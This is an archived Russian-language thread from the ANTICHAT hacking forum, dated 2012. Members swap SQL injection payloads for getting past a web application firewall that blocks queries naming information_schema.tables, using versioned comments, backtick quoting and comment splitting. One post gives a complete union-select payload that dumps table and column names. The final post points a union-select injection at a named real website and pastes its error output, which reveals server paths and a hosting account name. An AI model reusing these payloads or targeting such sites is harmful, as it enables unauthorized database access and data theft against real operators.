ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.01.2012, 17:36
|
|
Познающий
Регистрация: 11.12.2011
Сообщений: 38
Провел на форуме:
7749
Репутация:
0
|
|
Удалили ? Кто ? Я это был = ))
|
|
|
11.01.2012, 18:59
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020
Репутация:
55
|
|
/showpost.php?p=2951596&postcount=18
|
|
|
|
11.01.2012, 19:01
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от trololoman96
/showpost.php?p=2951596&postcount=18
У него известно название таблиц, а у меня нет.
information_schema.tables
|
|
|
|
11.01.2012, 19:14
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
фильтр на
Сообщение от None
from information_schema.tables
пробовал по-разному, так и так
/showpost.php?p=2289579&postcount=14623
/showpost.php?p=2386991&postcount=15253
все равно 403
Сообщение от None
/*!union*/+/*!select*/
с этим все нормально, версию он выводит
и кстати, может быть что запрос режется? |
|
|
|
11.01.2012, 19:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Expl0ited, только на information_schema.tables
после того как появляется в запросе — forbidden
|
|
|
|
11.01.2012, 19:55
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от faza02
Expl0ited
, только на information_schema.tables
после того как появляется в запросе — forbidden
Попробуй такое извращение:
information_schema./**/tables
2trololoman96,
он уже писал, что такие мохинации не сработали...
|
|
|
|
11.01.2012, 19:58
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от None
Expl0ited, только на information_schema.tables
после того как появляется в запросе — forbidden
попробуй полностью запрос в /*!sql*/ взять, типа
Код:
s.php?id=1+/*!union+select+1,2,3+information_schema.tables*/
|
|
|
|
11.01.2012, 23:43
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
При таких фильтрах в 80% случаев помогает `.
Код:
`information_schema`.`tables`
|
|
|
|
11.01.2012, 23:45
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Там было всё проще:
Код:
id=(1)and+false/*!union*//*!select(1),2,unhex(hex(concat_ws(0x3a,table_name, column_name))),(4)from(information_schema.columns)limit+1*/--+
|
|
|
|
12.01.2012, 13:02
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
Провел на форуме:
35174
Репутация:
-6
|
|
Код:
http://hydra-gym.com/index2.php?id=63
Код:
http://hydra-gym.com/index2.php?id=63/**/and/**/1=1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
But when I do id=- or id-null it gives me this error
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 8
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 23
Error: Table 'hydragym.HitCounterRef_1' doesn't exist
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
